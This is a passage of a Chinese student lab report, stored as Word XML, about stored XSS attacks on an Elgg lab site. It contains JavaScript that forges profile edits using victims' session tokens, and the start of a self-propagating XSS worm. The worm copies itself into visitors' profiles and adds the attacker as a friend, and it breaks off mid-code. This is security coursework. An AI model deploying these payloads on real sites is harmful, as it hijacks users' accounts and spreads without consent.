    <w:p w14:paraId="62AAEC7B" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9"/>
    <w:p w14:paraId="570D754F" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9"/>
    <w:p w14:paraId="30033A20" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9"/>
    <w:p w14:paraId="23E10D9C" w14:textId="3A5A29D2" w:rsidR="006001F9" w:rsidRDefault="008F7B0E" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可以看到，</w:t>
      </w:r>
      <w:r w:rsidR="004E380A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url为</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="004E380A" w:rsidRPr="00AF042C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.xsslabelgg.com/action/profile/edit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06988F7E" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2348909C" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>__elgg_token=kJuhIgtcyzGCer8q0NtwgQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A32232D" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;__elgg_ts=1600161496</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC102C" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;name=Samy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F9C7E" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;description=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD2B99" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[description]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA105A6" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;briefdescription=Samy is my hero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA86C57" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[briefdescription]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0473D" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;location=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA7985" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[location]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B6051" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;interests=&amp;accesslevel[interests]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABEF23A" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;skills=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F00132F" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[skills]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6474E2EA" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;contactemail=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D830F" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[contactemail]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BA498E" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;phone=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF944E" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[phone]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB32CF" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;mobile=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1FAC6" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[mobile]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F67DF9D" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;website=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D2F7B8" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[website]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C49EECE" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;twitter=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA547DC" w14:textId="77777777" w:rsidR="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;accesslevel[twitter]=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EFB8DE" w14:textId="2B5B10EE" w:rsidR="004E380A" w:rsidRPr="004E380A" w:rsidRDefault="004E380A" w:rsidP="006001F9">
      <w:r w:rsidRPr="004E380A">
        <w:t>&amp;guid=47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C52D37" w14:textId="1AEFF727" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="6D14E544" w14:textId="0432DA92" w:rsidR="006001F9" w:rsidRDefault="006E33E3" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>故将所给代码修改成如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500FA038" w14:textId="4A17C3D4" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="3161F931" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:t>&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A18B85" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
        <w:t>window.onload = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E722211" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var guid = "&amp;guid=" + elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91BB39" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var ts = "&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C83366" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var token = "&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B68CB03" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var name = "&amp;name="+elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E410EC8" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var desc = "&amp;description=Samy is my hero" + "&amp;accesslevel[description]=2";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E0B637" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var sendurl = "http://www.xsslabelgg.com/action/profile/edit";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BB5895" w14:textId="2DF7D521" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var content = token + ts + name + desc + guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B80E69" w14:textId="2A428145" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="006E33E3">
        <w:t>var samyGuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E33E3">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>47;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69424F07" w14:textId="3439C088" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if(elgg.session.user.guid != samyGuid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEA5F9" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B92008D" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var Ajax = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2BD272" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B356C94" w14:textId="269BF6C0" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.open("POST",sendurl,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855F951" w14:textId="1A6719A1" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="00A8559C">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1260"/>
      </w:pPr>
      <w:r w:rsidRPr="006E33E3">
        <w:t>Ajax.setRequestHeader("Host","www.xsslabelgg.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B934BB3" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBD503" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.send(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B7BCC4" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD17B87" w14:textId="77777777" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B3EB3" w14:textId="087CB919" w:rsidR="006001F9" w:rsidRDefault="006E33E3" w:rsidP="006E33E3">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091A3DF" w14:textId="6E48631F" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="6A0F968B" w14:textId="788D3CE8" w:rsidR="006001F9" w:rsidRDefault="00A8559C" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7772A79F" wp14:editId="5D669308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5274310" cy="2447290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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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E33E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录samy账号，将代码保存在about</w:t>
      </w:r>
      <w:r w:rsidR="006E33E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E33E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E69F7" w14:textId="5EA4EFB8" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006001F9"/>
    <w:p w14:paraId="560FD025" w14:textId="4E45C459" w:rsidR="006E33E3" w:rsidRDefault="00A8559C" w:rsidP="006001F9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5F075EF6" wp14:editId="1F6DB260">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-76200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>396240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="210439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06"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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E33E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录admin账号，点击查看samy的个人资料，然后返回查看自己的个人资料，可以发现个人简介被修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788773B4" w14:textId="167B0D08" w:rsidR="006E33E3" w:rsidRDefault="006E33E3" w:rsidP="006001F9"/>
    <w:p w14:paraId="666FB2FF" w14:textId="1AAA1B64" w:rsidR="006001F9" w:rsidRDefault="00A8559C" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DC156BC" wp14:editId="40251C4B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>327660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>250825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4946650" cy="1657350"/>
            <wp:effectExtent l="0" t="0" r="635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59" b="28154"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="494665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问题答案：首先将修改后的代码保存在About</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me中，可以看到资料里显示为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459B4FCD" w14:textId="5012B572" w:rsidR="006001F9" w:rsidRDefault="00A8559C" w:rsidP="006001F9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8DD9028" wp14:editId="371FD3A8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-160020</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>297180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="861060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13" b="31621"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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切换成admin用户登录，可以看到about</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me选项为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30647C30" w14:textId="17DB64F0" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="1B4AE94C" w14:textId="681C78BC" w:rsidR="006001F9" w:rsidRDefault="004440FA" w:rsidP="006001F9"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62B38F37" wp14:editId="66CA7018">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-312420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>281940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="967740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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99" b="28539"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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8559C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidR="00A8559C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>samy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的资料，结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C710F" w14:textId="6841DA57" w:rsidR="004440FA" w:rsidRDefault="004440FA" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们发现，samy的个人资料已经被更改，那么攻击自然不可能发生。会出现这种情况是因为，在修改资料后保存时，网页会跳转到攻击者本人的个人资料，恰好满足攻击发动的条件，如果不对攻击者本身的guid进行排除，那么攻击首先会生效在攻击者本人身上，并因缺少自我传播能力且代码已被修改成文本内容而就此结束攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41623643" w14:textId="6FC88F70" w:rsidR="00C33845" w:rsidRDefault="00C33845" w:rsidP="006001F9"/>
    <w:p w14:paraId="7C33B97D" w14:textId="202C6178" w:rsidR="00C33845" w:rsidRPr="00A44320" w:rsidRDefault="00A44320" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 6: Writing a Self-Propagating XSS Worm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C97010F" w14:textId="25685687" w:rsidR="006001F9" w:rsidRDefault="004B3BAF" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>补全任务所给代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141A211" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t>&lt;script type="text/javascript" id="worm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF34EC7" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t xml:space="preserve">window.onload = function(){        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21F1A5" w14:textId="55524321" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">var headerTag = "&lt;script id=\"worm\" type=\"text/javascript\"&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340407A" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t xml:space="preserve">        var jsCode = document.getElementById("worm").innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F653A0" w14:textId="40DC705A" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t xml:space="preserve">        var tailTag = "&lt;/" + "script&gt;";         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2E9A7" w14:textId="264CEB6B" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t xml:space="preserve">        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FAA547" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A36723" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:t xml:space="preserve">       var ts = "&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B89B75" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var token = "&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30A726" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=47"+token+ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89603A" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D81FE" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.open("GET",sendurl,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0967C" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.setRequestHeader("Host","www.xsslabelgg.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A89E923" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C1D89A" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F7392" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320"/>
    <w:p w14:paraId="1A2189F9" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
        <w:t>var guid = "&amp;guid=" + elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B6D872" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
        <w:t>var ts = "&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A4FB9" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
        <w:t>var token = "&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F162E6" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
        <w:t>var name = "&amp;name="+elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016BBA3F" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
        <w:t>var desc = "&amp;description=Samy is my hero" + wormCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD4A835" w14:textId="3C9BC74A" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">desc +="&amp;accesslevel[description]=2";  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2545AEE6" w14:textId="77777777" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:tab/>
        <w:t>var sendurl = "http://www.xsslabelgg.com/action/profile/edit";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D537658" w14:textId="6B1753CC" w:rsidR="00A44320" w:rsidRDefault="00A44320" w:rsidP="00A44320">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>var content = token + ts + name + desc + guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E477606" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="006E33E3">
        <w:t>var samyGuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E33E3">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
